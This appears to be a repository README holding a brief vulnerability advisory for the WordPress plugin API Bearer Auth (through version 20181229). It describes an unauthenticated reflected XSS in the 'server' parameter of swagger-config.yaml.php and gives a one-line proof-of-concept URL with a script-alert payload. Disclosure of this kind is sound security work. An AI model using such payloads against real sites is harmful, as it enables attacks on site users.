.. | |||
README.md | Loading last commit info... |
README.md
API Bearer Auth <= 20181229 - Unauthenticated Reflected XSS
Description The server GET parameter of the swagger/swagger-config.yaml.php file is affected by a reflected XSS issue.
Proof of Concept
/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=<script>alert("XSS")</script>